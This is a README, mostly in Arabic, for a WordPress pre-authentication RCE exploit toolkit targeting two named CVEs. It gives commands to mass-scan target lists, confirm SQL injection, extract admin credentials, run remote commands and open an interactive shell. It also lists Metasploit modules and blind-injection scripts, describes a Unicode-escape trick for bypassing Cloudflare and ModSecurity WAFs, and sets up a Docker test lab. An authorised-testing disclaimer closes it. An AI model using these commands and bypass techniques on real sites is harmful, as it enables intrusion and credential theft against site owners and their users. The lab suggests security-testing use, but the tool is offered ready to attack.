
استغلال RCE قبل المصادقة في ووردبريس + ماسح ضوئي + تجاوز WAF | CVE-2026-63030 + CVE-2026-60137 | Go + Python + وحدات Metasploit + مختبر Docker
___ __ ____
_ _____ |__ \ ___/ /_ ___ / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / /
| |/ |/ / __// __//_ / / / / __/ / /
|__/|__/\___//____//__/_/ /_/\___/_/_/
WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
by Venexy (M4xSec)
تنفيذ أوامر عن بُعد بدون مصادقة على WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. تم إصلاحها في الإصدارات 6.8.6 و6.9.5 و7.0.2.
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell
# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go
parse_request() لتزوير حساب مسؤولgo-scanner/wp2shell-master.go)ملف ثنائي متكامل — مسح، فحص، قراءة، استغلال، وشل تفاعلي.
go build -o wp2shell-master go-scanner/wp2shell-master.go
# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20
# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0
# Extract admin creds
./wp2shell-master read https://target.com --preset users
# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth
# Interactive shell
./wp2shell-master rce https://target.com -i -y
waf-bypass/)سكربتات مستقلة لتجاوز Cloudflare/ModSecurity عبر ترميز Unicode لكلمات SQL الرئيسية داخل JSON.
core.py — محرك حقن SQL أعمى مشترك مع تجاوز WAFdump_version.py — استخراج @@versiondump_dbname.py — استخراج DATABASE()dump_tables.py — تعداد الجداولdump_columns.py — تعداد الأعمدةrce_shell.py — سلسلة استغلال RCE كاملة مع تجاوز WAFmetasploit-modules/)التثبيت محليًا:
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb
يقوم جدار حماية Cloudflare WAF بفحص بايتات JSON الخام لكنه لا يفك تسلسلات الهروب \uXXXX قبل مطابقة الأنماط. بينما تقوم دالة PHP json_decode() في WordPress بفك ترميزها بشفافية تامة.
SLEEP → SLEEP — يتجاوز اكتشاف الكلمات المفتاحية: بدلاً من http://:) — أقصر ويتجنب قواعد أنماط URI/wp-json/batch/v1 — يتجنب حظر ?rest_route=Origin وReferer من النطاق المستهدف — تفي بفحوصات CORS والتحقق من نفس الأصلcd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!
ModSecurity CRS (OWASP) مع قواعد بأسلوب Cloudflare — تم تأكيد نجاح تجاوز Unicode.
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999
هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به غير قانوني.
MIT